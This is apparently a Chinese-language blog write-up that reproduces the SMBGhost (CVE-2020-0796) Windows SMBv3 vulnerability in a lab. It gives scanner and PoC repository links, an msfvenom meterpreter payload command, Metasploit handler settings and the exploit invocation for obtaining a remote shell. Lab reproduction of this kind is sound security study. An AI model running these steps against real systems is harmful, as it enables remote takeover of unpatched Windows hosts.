《永恒之黑》CVE-2020-0796漏洞复现

《永恒之黑》CVE-2020-0796漏洞复现

  • |漏洞简介

    2020年3月12日,微软正式发布CVE-2020-0796高危漏洞补丁,本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码,CVE-2020-0796漏洞与“永恒之蓝”系列漏洞极为相似,都是利用Windows SMB漏洞远程攻击获取系统最高权限。

  • |影响版本

    Windows 10 Version 1903 for 32-bit Systems

    Windows 10 Version 1903 for x64-based Systems

    Windows 10 Version 1903 for ARM64-based Systems

    Windows Server, Version 1903 (Server Core installation)

    Windows 10 Version 1909 for 32-bit Systems

    Windows 10 Version 1909 for x64-based Systems

    Windows 10 Version 1909 for ARM64-based Systems

    Windows Server, Version 1909 (Server Core installation)

  • |漏洞复现

    1.环境搭建:

    kali 攻击机:192.168.87.128

    win10靶机:192.168.87.143

    2.查看win10靶机版本,win+r,输入winver

    image-20211012194055638

    3.使用SMBGhost工具检测win靶机是否存在漏洞,工具下载:https://github.com/ollypwn/SMBGhost

    image-20211012194710368 image-20211012195055279

    也可以使用蓝屏payload,验证漏洞。蓝屏poc下载:https://github.com/chompie1337/SMBGhost_RCE_PoC

    image-20211012211655397

    win10出现蓝屏,说明存在漏洞

    image-20211012200202487

    当然也有其他很多方法,如:

    https://github.com/joaozietolie/CVE-2020-0796-Checker

    http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

    4.利用msfvenom生成的exp反弹shell

    msfvenom -p windows/x64/meterpreter/bind_tcp lport=4444 -b '\x00' -i 1 -f python>exploit

    image-20211012202524023

    msf生成的exploit

    image-20211012204413924

    替换SMBGhost_RCE_PoC中的exploit.py,并把buf改为USER_PAYLOAD

    image-20211012205114929

    5.替换好了,设置msf监听

    msfconsole //运行msf

    use exploit/multi/handler //开启监听模块

    set payload windows/x64/meterpreter/bind_tcp //设置反弹模式

    set rhost 192.168.87.143 //设置目标靶机ip

    set lport 4444 //设置监听端口

    run //运行

    image-20211012212803384

    6.SMBGhost_RCE_PoC执行payload,python3 exploit.py -ip 192.168.87.143,反弹shell

posted @ 2021-10-22 14:54  7omss  阅读(146)  评论(0编辑  收藏  举报